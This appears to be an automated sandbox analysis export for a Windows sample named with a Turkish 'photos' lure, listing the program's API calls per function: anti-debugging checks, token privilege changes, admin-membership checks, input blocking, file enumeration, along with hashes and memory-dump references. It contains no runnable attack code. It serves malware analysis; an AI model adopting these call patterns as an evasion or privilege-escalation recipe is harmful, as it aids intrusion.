                                                                      • Instruction Fuzzy Hash: 7B324674A00B059FCB28CF59C485A6AB7F0FF48710B15C56EE49ADB3A1EB70E941CB64
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00D85BDF
                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00D85C35
                                                                      • FindClose.KERNEL32(?), ref: 00D85C7D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Find$File$CloseFirstNext
                                                                      • String ID:
                                                                      • API String ID: 3541575487-0
                                                                      • Opcode ID: 5869e2ea034599193422684d8768e9de82ac87cd8a9b59f9c4639304d70c11a9
                                                                      • Instruction ID: c6e2fb0cfce23dd93b4ead40bcb50941539ab3ce345812c31e378488c455dbe4
                                                                      • Opcode Fuzzy Hash: 5869e2ea034599193422684d8768e9de82ac87cd8a9b59f9c4639304d70c11a9
                                                                      • Instruction Fuzzy Hash: C4517834604B019FC714DF28D490A9AB7E4FF49324F18855EE99A8B3A2CB30ED44CFA1
                                                                      APIs
                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 00D426AA
                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 00D426B4
                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 00D426C1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                      • String ID:
                                                                      • API String ID: 3906539128-0
                                                                      • Opcode ID: a77c2e2a74896851feed15321005c1da767795e5e9f9c28d73629aff3a028215
                                                                      • Instruction ID: 3ff95a9d9124bb160d7686226ae5f4ca78081fa076c46b20386bb079fc0e0899
                                                                      • Opcode Fuzzy Hash: a77c2e2a74896851feed15321005c1da767795e5e9f9c28d73629aff3a028215
                                                                      • Instruction Fuzzy Hash: D531B37491121C9BCB21DF68DD897DDBBB8EF08310F5041DAE41CA6261EB709F858F65
                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00D850F8
                                                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00D85156
                                                                      • SetErrorMode.KERNEL32(00000000), ref: 00D851BF
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$DiskFreeSpace
                                                                      • String ID:
                                                                      • API String ID: 1682464887-0
                                                                      • Opcode ID: f2b62d5c788a9d25aed11b87849139f2c0bd4d698ee88d7f50eabd990853dddc
                                                                      • Instruction ID: 3c09bb020bcdd0a2b28fd327fef2cd1fd727fc95f8bce4e271850abe1f3cca08
                                                                      • Opcode Fuzzy Hash: f2b62d5c788a9d25aed11b87849139f2c0bd4d698ee88d7f50eabd990853dddc
                                                                      • Instruction Fuzzy Hash: 29317C74A00218AFDB00DF54D888BEDBBB4FF48314F088099E8059B352DB31E84ACBB0
                                                                      APIs
                                                                        • Part of subcall function 00D2FD5B: __CxxThrowException@8.LIBVCRUNTIME ref: 00D305E8
                                                                        • Part of subcall function 00D2FD5B: __CxxThrowException@8.LIBVCRUNTIME ref: 00D30605
                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00D71651
                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00D7167E
                                                                      • GetLastError.KERNEL32 ref: 00D7168E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                      • String ID:
                                                                      • API String ID: 577356006-0
                                                                      • Opcode ID: d3501704a40be622a20e6f4288d652a26aa9e5983d3ebddad27671736cb7675b
                                                                      • Instruction ID: dc2a1132987b1bae42a21f505fc14d639cf975abf92ba795c66e62d4304b34d6
                                                                      • Opcode Fuzzy Hash: d3501704a40be622a20e6f4288d652a26aa9e5983d3ebddad27671736cb7675b
                                                                      • Instruction Fuzzy Hash: 6A11C1B1414304AFD7189F64EC86E6EB7FCEB04724B24862EF45A97251EB70FC408A74
                                                                      APIs
                                                                      • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00D7D5A0
                                                                      • DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000), ref: 00D7D5DD
                                                                      • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00D7D5E6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: CloseControlCreateDeviceFileHandle
                                                                      • String ID:
                                                                      • API String ID: 33631002-0
                                                                      • Opcode ID: 2f6946025b90b79c4b2801e08d7a991eee0d2d1cb54323a60ae8df960c5756e0
                                                                      • Instruction ID: 5e2a65aa274c2b35c81c0fe54cd3552c8cf77d8953c225883ab0ceb02e5fd60c
                                                                      • Opcode Fuzzy Hash: 2f6946025b90b79c4b2801e08d7a991eee0d2d1cb54323a60ae8df960c5756e0
                                                                      • Instruction Fuzzy Hash: B50175B1D01328BBE7109BACDC45FAFBABCEB0A750F144515B914E7190D2745A0587F0
                                                                      APIs
                                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00D715D0
                                                                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00D715E5
                                                                      • FreeSid.ADVAPI32(?), ref: 00D715F5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                      • String ID:
                                                                      • API String ID: 3429775523-0
                                                                      • Opcode ID: befbbefd86cfa1d27a923a5d4941adcbe1e335fc1f1c80ce3107b9752ab86382
                                                                      • Instruction ID: 1a3afea99aa71823de83a3e5677d146a1c65e91d69b2fd1523c77eb3989de58b
                                                                      • Opcode Fuzzy Hash: befbbefd86cfa1d27a923a5d4941adcbe1e335fc1f1c80ce3107b9752ab86382
                                                                      • Instruction Fuzzy Hash: F5F0177595030DFBDF00DFE4DC89AAEBBBCFB08614F508565E501E2281E774AA448B64
                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32(00000003,?,00D34C4E,00000003,00DD88C8,0000000C,00D34DA5,00000003,00000002,00000000,?,00D42879,00000003), ref: 00D34C99
                                                                      • TerminateProcess.KERNEL32(00000000,?,00D34C4E,00000003,00DD88C8,0000000C,00D34DA5,00000003,00000002,00000000,?,00D42879,00000003), ref: 00D34CA0
                                                                      • ExitProcess.KERNEL32 ref: 00D34CB2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CurrentExitTerminate
                                                                      • String ID:
                                                                      • API String ID: 1703294689-0
                                                                      • Opcode ID: 6a479bb58d3fa160e9d34f8542b97b46887f272e9b25df2503d0628f7ed12b7b
                                                                      • Instruction ID: 624476f9a17566c97d51571ce2c926bc67046325b2e3daa20416bea72816436c
                                                                      • Opcode Fuzzy Hash: 6a479bb58d3fa160e9d34f8542b97b46887f272e9b25df2503d0628f7ed12b7b
                                                                      • Instruction Fuzzy Hash: CEE0EC71112248AFCF11AF64DE19E583B79EF453A5F049014F845CA232CB39ED42CBB0
                                                                      APIs
                                                                      • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00D7E30B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: mouse_event
                                                                      • String ID: DOWN
                                                                      • API String ID: 2434400541-711622031
                                                                      • Opcode ID: 793967e179d9067741ce844909cc761eb0e22e6916b04e8ed644cc4f523fb6c2
                                                                      • Instruction ID: 273661b6e082b4a9af74984af0966522fc0bb6220b0c405c3f234a2681674380
                                                                      • Opcode Fuzzy Hash: 793967e179d9067741ce844909cc761eb0e22e6916b04e8ed644cc4f523fb6c2
                                                                      • Instruction Fuzzy Hash: 2FE0EC6619C7223DB94821587C0AEB7038C8B2A739B55528BF804E96C1FE986C8655B9
                                                                      APIs
                                                                      • GetUserNameW.ADVAPI32(?,?), ref: 00D6DA28
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: NameUser
                                                                      • String ID: X64
                                                                      • API String ID: 2645101109-893830106
                                                                      • Opcode ID: f049bc2b7557c6240479431f9c4aed00f6aaddb27cfc51ae9436b15703546752
                                                                      • Instruction ID: 0c8b11ec1294e83189b218824bd70d00e64f54ac31078f458401f5c53cf1c5c0
                                                                      • Opcode Fuzzy Hash: f049bc2b7557c6240479431f9c4aed00f6aaddb27cfc51ae9436b15703546752
                                                                      • Instruction Fuzzy Hash: 43D0C9B491512DEBCB80CB90EC88DD9777CBB14308F104151F146E2100DB7495488F30
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ebe32b9e9a0195b35bb6943144bf46fa156ca40a4ea5f4f8e36eb64e40b91145
                                                                      • Instruction ID: 278fb86f37f2d888b65c9ff2805dbe82bff647e32226c72cee7f8ba865396a8e
                                                                      • Opcode Fuzzy Hash: ebe32b9e9a0195b35bb6943144bf46fa156ca40a4ea5f4f8e36eb64e40b91145
                                                                      • Instruction Fuzzy Hash: FD021C72E102199BDF14CFA9D8806ADFBF1EF48314F199169E919F7340D731A941CB94
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00D86836
                                                                      • FindClose.KERNEL32(00000000), ref: 00D8687F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Find$CloseFileFirst
                                                                      • String ID:
                                                                      • API String ID: 2295610775-0
                                                                      • Opcode ID: b0a9105ab1fafc186b4044d6db68bf80f24c6d9de15eba4a34a11be94008ae9b
                                                                      • Instruction ID: 7be5c92aca06ba82d29b137abeb91d691727fd580e81963fc5650e0e4670cae6
                                                                      • Opcode Fuzzy Hash: b0a9105ab1fafc186b4044d6db68bf80f24c6d9de15eba4a34a11be94008ae9b
                                                                      • Instruction Fuzzy Hash: 651181716042009FC710DF29D489B15BBE4EF85324F58C5A9E8698F7A2CB30EC45CBA1
                                                                      APIs
                                                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00D947B8,?,?,00000035,?), ref: 00D83702
                                                                      • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00D947B8,?,?,00000035,?), ref: 00D83712
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFormatLastMessage
                                                                      • String ID:
                                                                      • API String ID: 3479602957-0
                                                                      • Opcode ID: 31f44c58fb77ed388bbd7583202ae2d046e0e9b8aa46da3e83b877df4f7594b2
                                                                      • Instruction ID: a0432842c3668cb2430176fd03435a64ecaa07ea152ac998e83740762bfc9a40
                                                                      • Opcode Fuzzy Hash: 31f44c58fb77ed388bbd7583202ae2d046e0e9b8aa46da3e83b877df4f7594b2
                                                                      • Instruction Fuzzy Hash: 70F065B56103256AEB2067B59C4DFEB7A6EEFC5B71F000165F909D2281DA60DD44C7B0
                                                                      APIs
                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00D71140), ref: 00D71018
                                                                      • CloseHandle.KERNEL32(?,?,00D71140), ref: 00D7102D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: AdjustCloseHandlePrivilegesToken
                                                                      • String ID:
                                                                      • API String ID: 81990902-0
                                                                      • Opcode ID: 392f1f894df2a6c64f19689d2919d2822fb6134f43babfa41c79ae7f883802de
                                                                      • Instruction ID: 79631adbe9e5f8df150281d04583a8348b0d6d1072f7a68088df9d5ad9f2ed0b
                                                                      • Opcode Fuzzy Hash: 392f1f894df2a6c64f19689d2919d2822fb6134f43babfa41c79ae7f883802de
                                                                      • Instruction Fuzzy Hash: 9EE04F32018710EEE7252B10FC05E7377A9EB04320B14882DF49680470DB626C90DB34
                                                                      Strings
                                                                      • Variable is not of type 'Object'., xrefs: 00D6181B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Variable is not of type 'Object'.
                                                                      • API String ID: 0-1840281001
                                                                      • Opcode ID: 562114666cc1233f97e5cfc35e4867a43c28f443f6e82f4b7818153a87b43e71
                                                                      • Instruction ID: aa30252a3fd126c304f7864f5f96032a62e3a0fa140c508615b0365f13cb3220
                                                                      • Opcode Fuzzy Hash: 562114666cc1233f97e5cfc35e4867a43c28f443f6e82f4b7818153a87b43e71
                                                                      • Instruction Fuzzy Hash: 2B329C78900218EFDF14DF90E890AEDB7B5FF54304F584059E846AB292DB75AE86CB70
                                                                      APIs
                                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,00000000,?,00000008,?,?,00D466F6,00000000,?,00000008,?,?,00D4FE9F,00000000), ref: 00D46928
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionRaise
                                                                      • String ID:
                                                                      • API String ID: 3997070919-0
                                                                      • Opcode ID: 8075f7014e8f901bf5b54beca2dca61e8a7597fa723c1e2f818528c6ac339c87
                                                                      • Instruction ID: a4b2389a0832dc0b01b5465ef3816daebdf3371b13ee5cb3ed54c163a0c1076d
                                                                      • Opcode Fuzzy Hash: 8075f7014e8f901bf5b54beca2dca61e8a7597fa723c1e2f818528c6ac339c87
                                                                      • Instruction Fuzzy Hash: FAB149316106089FDB19CF28C48AB657BE0FF46364F298658E8DACF2E1C375E991CB51
                                                                      APIs
                                                                      • BlockInput.USER32(00000001), ref: 00D8E9E4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: BlockInput
                                                                      • String ID:
                                                                      • API String ID: 3456056419-0
                                                                      • Opcode ID: eca6b0d70c4d6650f9bbac8627cb578790c3c4b69890c54b685e2f888e2fb6c9
                                                                      • Instruction ID: b976b07e76b4e452285b1be50ef0d801c6e76dbd3477040ecb399108677b40b6
                                                                      • Opcode Fuzzy Hash: eca6b0d70c4d6650f9bbac8627cb578790c3c4b69890c54b685e2f888e2fb6c9
                                                                      • Instruction Fuzzy Hash: AEE04F31210215AFC750FF6AD845A9AB7E8EF94760F048416FD49D7351DAB0ED418FB1
                                                                      APIs
                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_00020961,00D3036E), ref: 00D3095A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled
                                                                      • String ID:
                                                                      • API String ID: 3192549508-0
                                                                      • Opcode ID: 6018ae5788adf891393e37fda7e666c5522584e52f9939cf1a0160e323858200
                                                                      • Instruction ID: 68f4f7fe3a003656723fdaa932f71235055a777c30afdfa3e5d74d3041544812
                                                                      • Opcode Fuzzy Hash: 6018ae5788adf891393e37fda7e666c5522584e52f9939cf1a0160e323858200
                                                                      • Instruction Fuzzy Hash:
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
